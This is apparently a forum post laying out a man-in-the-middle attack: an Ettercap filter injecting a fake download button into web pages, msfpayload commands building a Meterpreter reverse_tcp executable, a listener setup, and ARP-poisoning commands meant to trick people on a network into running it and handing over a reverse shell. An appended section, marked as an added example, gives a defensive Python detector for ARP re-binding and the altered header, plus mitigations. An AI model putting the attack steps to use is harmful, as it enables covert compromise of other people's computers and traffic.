Take a look at the filter and look at what is being replaced... it's sort of HTML injection on the fly.
If anyone wants to see a quick video, I can post one to give you a better idea.

What I did was create a reverse Meterpreter executable, host it on a server, and do
some ARP poisoning with some HTML injection. You could use this to trick people into
downloading the .exe and get yourself a shell.

This is just a proof of concept and I take no responsibility.

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");

if (ip.proto == TCP && tcp.src == 80) {
      if (search(DATA.data, "<title>")) {
           replace("</title>", "</title><form action="" method="link"><img src=""><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>");
           msg("html injected");

I think this is the working filter.

-create the meterpeter.exe-
(open msfconsole)
./msfpayload windows/meterpeter/reverse_tcp LHOST= LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory

-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LPORT 100

-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //

Now wait for someone on the network to download and execute meterpeter.exe and you will have a reverse shell.

Let me know what you think.
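
Added example, not part of the original post: a defender-side check for the two network artefacts this setup leaves behind, namely the ARP re-binding from the poisoning step and the renamed Accept-Encoding request header from the filter. The function names, the allow-list and all sample data are constructed for illustration.

```python
from collections import defaultdict

# Constructed ARP replies as (time, claimed IP, sender MAC); not captured traffic.
SAMPLE_ARP = [
    (1, "192.168.1.1", "aa:aa:aa:aa:aa:01"),   # gateway, original MAC
    (2, "192.168.1.23", "aa:aa:aa:aa:aa:17"),  # workstation, original MAC
    (3, "192.168.1.1", "de:ad:be:ef:00:99"),   # gateway IP re-bound to a new MAC
    (4, "192.168.1.23", "de:ad:be:ef:00:99"),  # workstation IP re-bound to the same MAC
]
# Constructed HTTP request showing the header rename the filter performs.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\nHost: example.test\r\nAccept: text/html\r\n"
    "Accept-Nothing!: gzip, deflate\r\n\r\n"
)
# Common request headers that start with "Accept" (assumed allow-list).
KNOWN_ACCEPT = {"accept", "accept-charset", "accept-encoding", "accept-language"}

def arp_anomalies(replies):
    """Return (rebound, shared): IPs whose MAC changed, and MACs claiming >1 IP."""
    current, rebound, claimed = {}, {}, defaultdict(set)
    for _time, ip, mac in sorted(replies):
        mac = mac.lower()
        if ip in current and current[ip] != mac:
            rebound[ip] = (current[ip], mac)
        current[ip] = mac
        claimed[mac].add(ip)
    shared = {mac: sorted(ips) for mac, ips in claimed.items() if len(ips) > 1}
    return rebound, shared

def unknown_accept_headers(raw_request):
    """Return Accept* header names that are not on the allow-list."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    names = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, _value = line.partition(":")
        lowered = name.lower()
        if sep and lowered.startswith("accept") and lowered not in KNOWN_ACCEPT:
            names.append(name)
    return names

if __name__ == "__main__":
    rebound, shared = arp_anomalies(SAMPLE_ARP)
    for ip, (old, new) in rebound.items():
        print(f"ALERT {ip} moved from {old} to {new}")
    for mac, ips in shared.items():
        print(f"ALERT {mac} answers for {ips}")
    print("suspicious headers:", unknown_accept_headers(SAMPLE_REQUEST))
```

Both signals only exist because the traffic is plain HTTP on a switched LAN; serving pages over HTTPS with HSTS and enabling Dynamic ARP Inspection on the switch remove the injection point and the poisoning step respectively.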